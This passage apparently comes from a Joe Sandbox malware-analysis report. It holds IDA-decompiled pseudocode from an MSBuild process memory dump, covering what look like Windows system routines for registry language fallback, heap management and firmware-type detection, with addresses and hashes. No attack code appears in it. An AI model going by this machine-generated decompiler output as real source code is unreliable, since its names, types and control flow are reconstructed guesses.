                                            						if(_v56 != 0) {
                                            							_push(_v56);
                                            							E010495D0();
                                            						}
                                            						if(_t78 != 0) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                            						}
                                            						return _t97;
                                            					}
                                            					E0104FA60(_t78, 0, 0x158);
                                            					_v48 = _v48 & 0x00000000;
                                            					_t102 = _t101 + 0xc;
                                            					 *_t96 = 0;
                                            					 *_t93 = 0;
                                            					E0104BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                            					_v36 = 0x18;
                                            					_v28 =  &_v44;
                                            					_v64 = 0;
                                            					_push( &_v36);
                                            					_push(0x20019);
                                            					_v32 = 0;
                                            					_push( &_v64);
                                            					_v24 = 0x40;
                                            					_v20 = 0;
                                            					_v16 = 0;
                                            					_t97 = E01049600();
                                            					if(_t97 < 0) {
                                            						goto L6;
                                            					}
                                            					E0104BB40(0,  &_v36, L"InstallLanguageFallback");
                                            					_push(0);
                                            					_v48 = 4;
                                            					_t97 = L0100F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                            					if(_t97 >= 0) {
                                            						if(_v52 != 1) {
                                            							L17:
                                            							_t97 = 0xc0000001;
                                            							goto L6;
                                            						}
                                            						_t59 =  *_t78 & 0x0000ffff;
                                            						_t94 = _t78;
                                            						_t83 = _t59;
                                            						if(_t59 == 0) {
                                            							L19:
                                            							if(_t83 == 0) {
                                            								L23:
                                            								E0104BB40(_t83, _t102 + 0x24, _t78);
                                            								if(L010143C0( &_v48,  &_v64) == 0) {
                                            									goto L17;
                                            								}
                                            								_t84 = _v48;
                                            								 *_v48 = _v56;
                                            								if( *_t94 != 0) {
                                            									E0104BB40(_t84, _t102 + 0x24, _t94);
                                            									if(L010143C0( &_v48,  &_v64) != 0) {
                                            										 *_a4 = _v56;
                                            									} else {
                                            										_t97 = 0xc0000001;
                                            										 *_v48 = 0;
                                            									}
                                            								}
                                            								goto L6;
                                            							}
                                            							_t83 = _t83 & 0x0000ffff;
                                            							while(_t83 == 0x20) {
                                            								_t94 =  &(_t94[1]);
                                            								_t74 =  *_t94 & 0x0000ffff;
                                            								_t83 = _t74;
                                            								if(_t74 != 0) {
                                            									continue;
                                            								}
                                            								goto L23;
                                            							}
                                            							goto L23;
                                            						} else {
                                            							goto L14;
                                            						}
                                            						while(1) {
                                            							L14:
                                            							_t27 =  &(_t94[1]); // 0x2
                                            							_t75 = _t27;
                                            							if(_t83 == 0x2c) {
                                            								break;
                                            							}
                                            							_t94 = _t75;
                                            							_t76 =  *_t94 & 0x0000ffff;
                                            							_t83 = _t76;
                                            							if(_t76 != 0) {
                                            								continue;
                                            							}
                                            							goto L23;
                                            						}
                                            						 *_t94 = 0;
                                            						_t94 = _t75;
                                            						_t83 =  *_t75 & 0x0000ffff;
                                            						goto L19;
                                            					}
                                            				}
                                            			}































                                            0x0100e620
                                            0x0100e628
                                            0x0100e62f
                                            0x0100e631
                                            0x0100e635
                                            0x0100e637
                                            0x0100e63e
                                            0x01065503
                                            0x01065503
                                            0x0100e64c
                                            0x0100e64c
                                            0x0100e651
                                            0x00000000
                                            0x00000000
                                            0x0100e661
                                            0x0100e665
                                            0x0106542a
                                            0x0100e715
                                            0x0100e71a
                                            0x0100e71c
                                            0x0100e720
                                            0x0100e720
                                            0x0100e727
                                            0x0100e736
                                            0x0100e736
                                            0x0100e743
                                            0x0100e743
                                            0x0100e673
                                            0x0100e678
                                            0x0100e67d
                                            0x0100e682
                                            0x0100e685
                                            0x0100e692
                                            0x0100e69b
                                            0x0100e6a3
                                            0x0100e6ad
                                            0x0100e6b1
                                            0x0100e6b2
                                            0x0100e6bb
                                            0x0100e6bf
                                            0x0100e6c0
                                            0x0100e6c8
                                            0x0100e6cc
                                            0x0100e6d5
                                            0x0100e6d9
                                            0x00000000
                                            0x00000000
                                            0x0100e6e5
                                            0x0100e6ea
                                            0x0100e6f9
                                            0x0100e70b
                                            0x0100e70f
                                            0x01065439
                                            0x0106545e
                                            0x0106545e
                                            0x00000000
                                            0x0106545e
                                            0x0106543b
                                            0x0106543e
                                            0x01065440
                                            0x01065445
                                            0x01065472
                                            0x01065475
                                            0x0106548d
                                            0x01065493
                                            0x010654a9
                                            0x00000000
                                            0x00000000
                                            0x010654ab
                                            0x010654b4
                                            0x010654bc
                                            0x010654c8
                                            0x010654de
                                            0x010654fb
                                            0x010654e0
                                            0x010654e6
                                            0x010654eb
                                            0x010654eb
                                            0x010654de
                                            0x00000000
                                            0x010654bc
                                            0x01065477
                                            0x0106547a
                                            0x01065480
                                            0x01065483
                                            0x01065486
                                            0x0106548b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0106548b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01065447
                                            0x01065447
                                            0x01065447
                                            0x01065447
                                            0x0106544e
                                            0x00000000
                                            0x00000000
                                            0x01065450
                                            0x01065452
                                            0x01065455
                                            0x0106545a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0106545c
                                            0x0106546a
                                            0x0106546d
                                            0x0106546f
                                            0x00000000
                                            0x0106546f
                                            0x0100e70f

                                            Strings
                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0100E68C
                                            • InstallLanguageFallback, xrefs: 0100E6DB
                                            • @, xrefs: 0100E6C0
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                            • API String ID: 0-1757540487
                                            • Opcode ID: 714c9e69ea9fbad6de4f003d4fdf86d1fa06ac3636c1b2a3141f39ef804d75fa
                                            • Instruction ID: b13d63b6a729ac2748b451a51edf67d5972131159d0b8a4d8da5fad1062e46c7
                                            • Opcode Fuzzy Hash: 714c9e69ea9fbad6de4f003d4fdf86d1fa06ac3636c1b2a3141f39ef804d75fa
                                            • Instruction Fuzzy Hash: D05194B15043469BD715DF68C880AABB7E8BF98754F0509AEF9C5E7240FB34D904C792
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E0102B8E4(unsigned int __edx) {
                                            				void* __ecx;
                                            				void* __edi;
                                            				intOrPtr* _t16;
                                            				intOrPtr _t18;
                                            				void* _t27;
                                            				void* _t28;
                                            				unsigned int _t30;
                                            				intOrPtr* _t31;
                                            				unsigned int _t38;
                                            				void* _t39;
                                            				unsigned int _t40;
                                            
                                            				_t40 = __edx;
                                            				_t39 = _t28;
                                            				if( *0x10f8748 >= 1) {
                                            					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                                            					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                                            						_t18 =  *[fs:0x30];
                                            						__eflags =  *(_t18 + 0xc);
                                            						if( *(_t18 + 0xc) == 0) {
                                            							_push("HEAP: ");
                                            							E0100B150();
                                            						} else {
                                            							E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            						}
                                            						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                                            						E0100B150();
                                            						__eflags =  *0x10f7bc8;
                                            						if(__eflags == 0) {
                                            							E010C2073(_t27, 1, _t39, __eflags);
                                            						}
                                            					}
                                            				}
                                            				_t38 =  *(_t39 + 0xb8);
                                            				if(_t38 != 0) {
                                            					_t13 = _t40 >> 0xc;
                                            					__eflags = _t13;
                                            					while(1) {
                                            						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                                            						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                                            							break;
                                            						}
                                            						_t30 =  *_t38;
                                            						__eflags = _t30;
                                            						if(_t30 != 0) {
                                            							_t38 = _t30;
                                            							continue;
                                            						}
                                            						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                                            						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                                            						break;
                                            					}
                                            					return E0102AB40(_t39, _t38, 0, _t13, _t40);
                                            				} else {
                                            					_t31 = _t39 + 0x8c;
                                            					_t16 =  *_t31;
                                            					while(_t31 != _t16) {
                                            						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                                            						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                                            							return _t16;
                                            						}
                                            						_t16 =  *_t16;
                                            					}
                                            					return _t31;
                                            				}
                                            			}














                                            0x0102b8f0
                                            0x0102b8f2
                                            0x0102b8f4
                                            0x01072c4e
                                            0x01072c50
                                            0x01072c56
                                            0x01072c5c
                                            0x01072c60
                                            0x01072c7f
                                            0x01072c84
                                            0x01072c62
                                            0x01072c77
                                            0x01072c7c
                                            0x01072c8a
                                            0x01072c8f
                                            0x01072c94
                                            0x01072c9c
                                            0x01072ca5
                                            0x01072ca5
                                            0x01072c9c
                                            0x01072c50
                                            0x0102b8fa
                                            0x0102b902
                                            0x0102b921
                                            0x0102b921
                                            0x0102b924
                                            0x0102b924
                                            0x0102b927
                                            0x00000000
                                            0x00000000
                                            0x0102b929
                                            0x0102b92b
                                            0x0102b92d
                                            0x0102b940
                                            0x00000000
                                            0x0102b940
                                            0x0102b932
                                            0x0102b932
                                            0x00000000
                                            0x0102b932
                                            0x00000000
                                            0x0102b904
                                            0x0102b904
                                            0x0102b90a
                                            0x0102b90c
                                            0x0102b916
                                            0x0102b919
                                            0x0102b915
                                            0x0102b915
                                            0x0102b91b
                                            0x0102b91b
                                            0x00000000
                                            0x0102b910

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            • Opcode ID: dc97faacde67038b6c4591355c2a2bb9ebf15d02f87a9970c07876f98420ef3b
                                            • Instruction ID: cb54dec72d772c894a34fb58cd42b1f1a61af0a6715fd8a7cf2f8e5db923519d
                                            • Opcode Fuzzy Hash: dc97faacde67038b6c4591355c2a2bb9ebf15d02f87a9970c07876f98420ef3b
                                            • Instruction Fuzzy Hash: 1E112631714516DFE729D719C480BB9B7A5EF90B20F14806DE0CACB291D670D840CB45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E010CE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                            				signed int _v20;
                                            				char _v24;
                                            				signed int _v40;
                                            				char _v44;
                                            				intOrPtr _v48;
                                            				signed int _v52;
                                            				unsigned int _v56;
                                            				char _v60;
                                            				signed int _v64;
                                            				char _v68;
                                            				signed int _v72;
                                            				void* __ebx;
                                            				void* __edi;
                                            				char _t87;
                                            				signed int _t90;
                                            				signed int _t94;
                                            				signed int _t100;
                                            				intOrPtr* _t113;
                                            				signed int _t122;
                                            				void* _t132;
                                            				void* _t135;
                                            				signed int _t139;
                                            				signed int* _t141;
                                            				signed int _t146;
                                            				signed int _t147;
                                            				void* _t153;
                                            				signed int _t155;
                                            				signed int _t159;
                                            				char _t166;
                                            				void* _t172;
                                            				void* _t176;
                                            				signed int _t177;
                                            				intOrPtr* _t179;
                                            
                                            				_t179 = __ecx;
                                            				_v48 = __edx;
                                            				_v68 = 0;
                                            				_v72 = 0;
                                            				_push(__ecx[1]);
                                            				_push( *__ecx);
                                            				_push(0);
                                            				_t153 = 0x14;
                                            				_t135 = _t153;
                                            				_t132 = E010CBBBB(_t135, _t153);
                                            				if(_t132 == 0) {
                                            					_t166 = _v68;
                                            					goto L43;
                                            				} else {
                                            					_t155 = 0;
                                            					_v52 = 0;
                                            					asm("stosd");
                                            					asm("stosd");
                                            					asm("stosd");
                                            					asm("stosd");
                                            					asm("stosd");
                                            					_v56 = __ecx[1];
                                            					if( *__ecx >> 8 < 2) {
                                            						_t155 = 1;
                                            						_v52 = 1;
                                            					}
                                            					_t139 = _a4;
                                            					_t87 = (_t155 << 0xc) + _t139;
                                            					_v60 = _t87;
                                            					if(_t87 < _t139) {
                                            						L11:
                                            						_t166 = _v68;
                                            						L12:
                                            						if(_t132 != 0) {
                                            							E010CBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                            						}
                                            						L43:
                                            						if(_v72 != 0) {
                                            							_push( *((intOrPtr*)(_t179 + 4)));
                                            							_push( *_t179);
                                            							_push(0x8000);
                                            							E010CAFDE( &_v72,  &_v60);
                                            						}
                                            						L46:
                                            						return _t166;
                                            					}
                                            					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                            					asm("sbb edi, edi");
                                            					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                            					if(_t90 != 0) {
                                            						_push(0);
                                            						_push(0x14);
                                            						_push( &_v44);
                                            						_push(3);
                                            						_push(_t179);
                                            						_push(0xffffffff);
                                            						if(E01049730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                            							_push(_t139);
                                            							E010CA80D(_t179, 1, _v40, 0);
                                            							_t172 = 4;
                                            						}
                                            					}
                                            					_t141 =  &_v72;
                                            					if(E010CA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                            						_v64 = _a4;
                                            						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                            						asm("sbb edi, edi");
                                            						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                            						if(_t94 != 0) {
                                            							_push(0);
                                            							_push(0x14);
                                            							_push( &_v24);
                                            							_push(3);
                                            							_push(_t179);
                                            							_push(0xffffffff);
                                            							if(E01049730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                            								_push(_t141);
                                            								E010CA80D(_t179, 1, _v20, 0);
                                            								_t176 = 4;
                                            							}
                                            						}
                                            						if(E010CA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                            							goto L11;
                                            						} else {
                                            							_t177 = _v64;
                                            							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                            							_t100 = _v52 + _v52;
                                            							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                            							 *(_t132 + 0x10) = _t146;
                                            							asm("bsf eax, [esp+0x18]");
                                            							_v52 = _t100;
                                            							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                            							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                            							_t47 =  &_a8;
                                            							 *_t47 = _a8 & 0x00000001;
                                            							if( *_t47 == 0) {
                                            								E01022280(_t179 + 0x30, _t179 + 0x30);
                                            							}
                                            							_t147 =  *(_t179 + 0x34);
                                            							_t159 =  *(_t179 + 0x38) & 1;
                                            							_v68 = 0;
                                            							if(_t147 == 0) {
                                            								L35:
                                            								E0101B090(_t179 + 0x34, _t147, _v68, _t132);
                                            								if(_a8 == 0) {
                                            									E0101FFB0(_t132, _t177, _t179 + 0x30);
                                            								}
                                            								asm("lock xadd [eax], ecx");
                                            								asm("lock xadd [eax], edx");
                                            								_t132 = 0;
                                            								_v72 = _v72 & 0;
                                            								_v68 = _v72;
                                            								if(E01027D50() == 0) {
                                            									_t113 = 0x7ffe0388;
                                            								} else {
                                            									_t177 = _v64;
                                            									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            								}
                                            								if( *_t113 == _t132) {
                                            									_t166 = _v68;
                                            									goto L46;
                                            								} else {
                                            									_t166 = _v68;
                                            									E010BFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                            									goto L12;
                                            								}
                                            							} else {
                                            								L23:
                                            								while(1) {
                                            									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                            										_t122 =  *_t147;
                                            										if(_t159 == 0) {
                                            											L32:
                                            											if(_t122 == 0) {
                                            												L34:
                                            												_v68 = 0;
                                            												goto L35;
                                            											}
                                            											L33:
                                            											_t147 = _t122;
                                            											continue;
                                            										}
                                            										if(_t122 == 0) {
                                            											goto L34;
                                            										}
                                            										_t122 = _t122 ^ _t147;
                                            										goto L32;
                                            									}
                                            									_t122 =  *(_t147 + 4);
                                            									if(_t159 == 0) {
                                            										L27:
                                            										if(_t122 != 0) {
                                            											goto L33;
                                            										}
                                            										L28:
                                            										_v68 = 1;
                                            										goto L35;
                                            									}
                                            									if(_t122 == 0) {
                                            										goto L28;
                                            									}
                                            									_t122 = _t122 ^ _t147;
                                            									goto L27;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					_v72 = _v72 & 0x00000000;
                                            					goto L11;
                                            				}
                                            			}




































                                            0x010ce547
                                            0x010ce549
                                            0x010ce54f
                                            0x010ce553
                                            0x010ce557
                                            0x010ce55a
                                            0x010ce55c
                                            0x010ce55f
                                            0x010ce561
                                            0x010ce567
                                            0x010ce56b
                                            0x010ce7e2
                                            0x00000000
                                            0x010ce571
                                            0x010ce575
                                            0x010ce577
                                            0x010ce57b
                                            0x010ce57c
                                            0x010ce57d
                                            0x010ce57e
                                            0x010ce57f
                                            0x010ce588
                                            0x010ce58f
                                            0x010ce591
                                            0x010ce592
                                            0x010ce592
                                            0x010ce596
                                            0x010ce59e
                                            0x010ce5a0
                                            0x010ce5a6
                                            0x010ce61d
                                            0x010ce61d
                                            0x010ce621
                                            0x010ce623
                                            0x010ce630
                                            0x010ce630
                                            0x010ce7e6
                                            0x010ce7eb
                                            0x010ce7ed
                                            0x010ce7f4
                                            0x010ce7fa
                                            0x010ce7ff
                                            0x010ce7ff
                                            0x010ce80a
                                            0x010ce812
                                            0x010ce812
                                            0x010ce5ab
                                            0x010ce5b4
                                            0x010ce5b9
                                            0x010ce5be
                                            0x010ce5c0
                                            0x010ce5c2
                                            0x010ce5c8
                                            0x010ce5c9
                                            0x010ce5cb
                                            0x010ce5cc
                                            0x010ce5d5
                                            0x010ce5e4
                                            0x010ce5f1
                                            0x010ce5f8
                                            0x010ce5f8
                                            0x010ce5d5
                                            0x010ce602
                                            0x010ce616
                                            0x010ce63d
                                            0x010ce644
                                            0x010ce64d
                                            0x010ce652
                                            0x010ce657
                                            0x010ce659
                                            0x010ce65b
                                            0x010ce661
                                            0x010ce662
                                            0x010ce664
                                            0x010ce665
                                            0x010ce66e
                                            0x010ce67d
                                            0x010ce68a
                                            0x010ce691
                                            0x010ce691
                                            0x010ce66e
                                            0x010ce6b0
                                            0x00000000
                                            0x010ce6b6
                                            0x010ce6bd
                                            0x010ce6c7
                                            0x010ce6d7
                                            0x010ce6d9
                                            0x010ce6db
                                            0x010ce6de
                                            0x010ce6e3
                                            0x010ce6f3
                                            0x010ce6fc
                                            0x010ce700
                                            0x010ce700
                                            0x010ce704
                                            0x010ce70a
                                            0x010ce70a
                                            0x010ce713
                                            0x010ce716
                                            0x010ce719
                                            0x010ce720
                                            0x010ce761
                                            0x010ce76b
                                            0x010ce774
                                            0x010ce77a
                                            0x010ce77a
                                            0x010ce78a
                                            0x010ce791
                                            0x010ce799
                                            0x010ce79b
                                            0x010ce79f
                                            0x010ce7aa
                                            0x010ce7c0
                                            0x010ce7ac
                                            0x010ce7b2
                                            0x010ce7b9
                                            0x010ce7b9
                                            0x010ce7c7
                                            0x010ce806
                                            0x00000000
                                            0x010ce7c9
                                            0x010ce7d1
                                            0x010ce7d8
                                            0x00000000
                                            0x010ce7d8
                                            0x00000000
                                            0x00000000
                                            0x010ce722
                                            0x010ce72e
                                            0x010ce748
                                            0x010ce74c
                                            0x010ce754
                                            0x010ce756
                                            0x010ce75c
                                            0x010ce75c
                                            0x00000000
                                            0x010ce75c
                                            0x010ce758
                                            0x010ce758
                                            0x00000000
                                            0x010ce758
                                            0x010ce750
                                            0x00000000
                                            0x00000000
                                            0x010ce752
                                            0x00000000
                                            0x010ce752
                                            0x010ce730
                                            0x010ce735
                                            0x010ce73d
                                            0x010ce73f
                                            0x00000000
                                            0x00000000
                                            0x010ce741
                                            0x010ce741
                                            0x00000000
                                            0x010ce741
                                            0x010ce739
                                            0x00000000
                                            0x00000000
                                            0x010ce73b
                                            0x00000000
                                            0x010ce73b
                                            0x010ce722
                                            0x010ce720
                                            0x010ce6b0
                                            0x010ce618
                                            0x00000000
                                            0x010ce618

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                            • Instruction ID: 45360eaf275deead8ad53860c884048ab0d1fecb6bd95ba7fc182518f1296d7b
                                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                            • Instruction Fuzzy Hash: C9916C712043429BE764CF29C841B5BBBE5BF88B14F14896DF6D98B280E774E908CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E010851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                            				signed short* _t63;
                                            				signed int _t64;
                                            				signed int _t65;
                                            				signed int _t67;
                                            				intOrPtr _t74;
                                            				intOrPtr _t84;
                                            				intOrPtr _t88;
                                            				intOrPtr _t94;
                                            				void* _t100;
                                            				void* _t103;
                                            				intOrPtr _t105;
                                            				signed int _t106;
                                            				short* _t108;
                                            				signed int _t110;
                                            				signed int _t113;
                                            				signed int* _t115;
                                            				signed short* _t117;
                                            				void* _t118;
                                            				void* _t119;
                                            
                                            				_push(0x80);
                                            				_push(0x10e05f0);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                            				_t115 =  *(_t118 + 0xc);
                                            				 *(_t118 - 0x7c) = _t115;
                                            				 *((char*)(_t118 - 0x65)) = 0;
                                            				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                            				_t113 = 0;
                                            				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                            				 *((intOrPtr*)(_t118 - 4)) = 0;
                                            				_t100 = __ecx;
                                            				if(_t100 == 0) {
                                            					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                            					E0101EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            					 *((char*)(_t118 - 0x65)) = 1;
                                            					_t63 =  *(_t118 - 0x90);
                                            					_t101 = _t63[2];
                                            					_t64 =  *_t63 & 0x0000ffff;
                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                            					L20:
                                            					_t65 = _t64 >> 1;
                                            					L21:
                                            					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                            					if(_t108 == 0) {
                                            						L27:
                                            						 *_t115 = _t65 + 1;
                                            						_t67 = 0xc0000023;
                                            						L28:
                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                            						L29:
                                            						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                            						E010853CA(0);
                                            						return E0105D130(0, _t113, _t115);
                                            					}
                                            					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                            						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                            							 *_t108 = 0;
                                            						}
                                            						goto L27;
                                            					}
                                            					 *_t115 = _t65;
                                            					_t115 = _t65 + _t65;
                                            					E0104F3E0(_t108, _t101, _t115);
                                            					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                            					_t67 = 0;
                                            					goto L28;
                                            				}
                                            				_t103 = _t100 - 1;
                                            				if(_t103 == 0) {
                                            					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                            					_t74 = E01023690(1, _t117, 0xfe1810, _t118 - 0x74);
                                            					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                            					_t101 = _t117[2];
                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                            					if(_t74 < 0) {
                                            						_t64 =  *_t117 & 0x0000ffff;
                                            						_t115 =  *(_t118 - 0x7c);
                                            						goto L20;
                                            					}
                                            					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                            					_t115 =  *(_t118 - 0x7c);
                                            					goto L21;
                                            				}
                                            				if(_t103 == 1) {
                                            					_t105 = 4;
                                            					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                            					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                            					_push(_t118 - 0x70);
                                            					_push(0);
                                            					_push(0);
                                            					_push(_t105);
                                            					_push(_t118 - 0x78);
                                            					_push(0x6b);
                                            					 *((intOrPtr*)(_t118 - 0x64)) = E0104AA90();
                                            					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                            					_t113 = L01024620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                            					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                            					if(_t113 != 0) {
                                            						_push(_t118 - 0x70);
                                            						_push( *((intOrPtr*)(_t118 - 0x70)));
                                            						_push(_t113);
                                            						_push(4);
                                            						_push(_t118 - 0x78);
                                            						_push(0x6b);
                                            						_t84 = E0104AA90();
                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                            						if(_t84 < 0) {
                                            							goto L29;
                                            						}
                                            						_t110 = 0;
                                            						_t106 = 0;
                                            						while(1) {
                                            							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                            							 *(_t118 - 0x88) = _t106;
                                            							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                            								break;
                                            							}
                                            							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                            							_t106 = _t106 + 1;
                                            						}
                                            						_t88 = E0108500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                            						_t119 = _t119 + 0x1c;
                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                            						if(_t88 < 0) {
                                            							goto L29;
                                            						}
                                            						_t101 = _t118 - 0x3c;
                                            						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                            						goto L21;
                                            					}
                                            					_t67 = 0xc0000017;
                                            					goto L28;
                                            				}
                                            				_push(0);
                                            				_push(0x20);
                                            				_push(_t118 - 0x60);
                                            				_push(0x5a);
                                            				_t94 = E01049860();
                                            				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                            				if(_t94 < 0) {
                                            					goto L29;
                                            				}
                                            				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                            					_t101 = L"Legacy";
                                            					_push(6);
                                            				} else {
                                            					_t101 = L"UEFI";
                                            					_push(4);
                                            				}
                                            				_pop(_t65);
                                            				goto L21;
                                            			}






















                                            0x010851be
                                            0x010851c3
                                            0x010851c8
                                            0x010851cd
                                            0x010851d0
                                            0x010851d3
                                            0x010851d8
                                            0x010851db
                                            0x010851de
                                            0x010851e0
                                            0x010851e3
                                            0x010851e6
                                            0x010851e8
                                            0x01085342
                                            0x01085351
                                            0x01085356
                                            0x0108535a
                                            0x01085360
                                            0x01085363
                                            0x01085366
                                            0x01085369
                                            0x01085369
                                            0x0108536b
                                            0x0108536b
                                            0x01085370
                                            0x010853a3
                                            0x010853a4
                                            0x010853a6
                                            0x010853ab
                                            0x010853ab
                                            0x010853ae
                                            0x010853ae
                                            0x010853b5
                                            0x010853bf
                                            0x010853bf
                                            0x01085375
                                            0x01085396
                                            0x010853a0
                                            0x010853a0
                                            0x00000000
                                            0x01085396
                                            0x01085377
                                            0x01085379
                                            0x0108537f
                                            0x0108538c
                                            0x01085390
                                            0x00000000
                                            0x01085390
                                            0x010851ee
                                            0x010851f1
                                            0x01085301
                                            0x01085310
                                            0x01085315
                                            0x01085318
                                            0x0108531b
                                            0x01085320
                                            0x0108532e
                                            0x01085331
                                            0x00000000
                                            0x01085331
                                            0x01085328
                                            0x01085329
                                            0x00000000
                                            0x01085329
                                            0x010851fa
                                            0x01085235
                                            0x01085236
                                            0x01085239
                                            0x0108523f
                                            0x01085240
                                            0x01085241
                                            0x01085242
                                            0x01085246
                                            0x01085247
                                            0x0108524e
                                            0x01085251
                                            0x01085267
                                            0x01085269
                                            0x0108526e
                                            0x0108527d
                                            0x0108527e
                                            0x01085281
                                            0x01085282
                                            0x01085287
                                            0x01085288
                                            0x0108528a
                                            0x0108528f
                                            0x01085294
                                            0x00000000
                                            0x00000000
                                            0x0108529a
                                            0x0108529c
                                            0x0108529e
                                            0x0108529e
                                            0x010852a4
                                            0x010852b0
                                            0x00000000
                                            0x00000000
                                            0x010852ba
                                            0x010852bc
                                            0x010852bc
                                            0x010852d4
                                            0x010852d9
                                            0x010852dc
                                            0x010852e1
                                            0x00000000
                                            0x00000000
                                            0x010852e7
                                            0x010852f4
                                            0x00000000
                                            0x010852f4
                                            0x01085270
                                            0x00000000
